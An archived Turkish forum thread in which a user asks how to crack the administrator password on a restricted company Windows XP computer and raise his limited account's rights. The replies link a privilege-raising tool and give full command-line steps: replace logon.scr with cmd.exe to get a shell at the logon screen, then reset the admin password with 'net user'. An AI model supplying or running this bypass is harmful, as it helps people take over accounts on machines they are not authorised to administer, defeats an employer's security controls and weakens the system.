Jump to content

Windows Xp Kısıtlama Kaldırılması Ve Admin Şifresi

Thund3R

Recommended Posts

İyi Günler Arkadaşlar Benim Sizlerden Bir Ricam Olacak..

Elimde Bir Bilsayar var Yalnız Bu Şirket Bilgisayarı Olduğu için Bayağı Kısıtlı ve ne yazıkki üzerinde

ne CD-ROM ne Disket Sürücü var...

Pc'yi Flash Disk ile açmak istediğimde takılıyor yani açmıyor..Biosu Şifreli Anlayacağınız Bilgisayarın Heryeri Şİfreli..

Kendi Kullanıcı Hesabımla Giriş yapıyorm fakat sınırlı hesap olduğu için ne program kurulabiliyor nede Denetim Masasına Giriş İznim Var..

Acaba Bu Sorunu Nasıl Çözebilirim yani Administrator Şifresini Nasıl Kırıp Kendi Hesabımın Yetkisini Yükseltebilirim?

MakeMeAdmin diye bir program olması lazım.Seni geçici admin yapıyor.

Hiç kullanmadım ama bir dene istersen.

http://aaronmargosis.members.winisp.net/MakeMeAdmin/MakeMeAdmin.zip[/CODE]

Birkaç sene önce söle bir yöntem bulmuştum netten, dökümanı bulmam biraz zor oldu ama hiç denemedim belki işine yarar...

Sınırlı Kullanıcı Hesaplarını Yöneticiye Çevirmek

1) Sınırlı hesapla oturmu açın

2) Başlat>>Çalıştıra gelip cmd yazın ve aşağıda ki komutları sarayla girin

cd\\
cd\\windows\\system32 (system32`nin icine girer)
mkdir temphack (temphack dosyasini yaratir)
copy logon.scr temphack\\logon.scr (logon.scr dosyasini temphack`in icine kopyalar)
copy cmd.exe temphack\\cmd.exe (cmd.exe dosyasini temphack`in icine kopyalar)
del logon.scr (orjinal logon.scr dosyasini siler)
rename cmd.exe logon.scr (cmd.exe dosyasini logon.scr olarak degistirir)
exit

3) Komuları girdikten sonra bilgisayarınızı yeniden başlatın. Bilgisayar başladığında karşınıza DOS ekranı çıkacaktır ve DOS ekranına şu komutları girini;

net user <admin hesabinin adi> istediginiz bir sifre
Örneğin Admin hesabının adı Ercab ve şifreyide 123456 yapmak istiyorsunuz
?net user Ercab 123456? (Yazdığınızda Windows Açılıyor ve Şifrede 123456 oluyor)

Önemli Not: Zararları da olabilir ama yöntem bir bakıma işe yarıyor. Peki zararları ne olabilir.

1) del logon.scr (orjinal logon.scr dosyasini siler) XP üzerinde orijinal dosyalar silinmemelidir. Eğer silinirse XP?nin stabil çalışması bozulabilir.

2) 2- copy cmd.exe temphack\\cmd.exe (cmd.exe dosyasini temphack`in icine kopyalar) Bu Demek Oluyor ki. İstemediğiniz Takdirde. İstemediğiniz Yazılımlar Sizin Oturumunuzda CMD üzerinden Komut Çalıştırabilir. Ama kimse sizin böyle bir şey yapıp yapmadığınızı tahmin edemez.[/CODE]

Archived

This topic is now archived and is closed to further replies.

• Recently Browsing   0 members

No registered users viewing this page.

• Create New...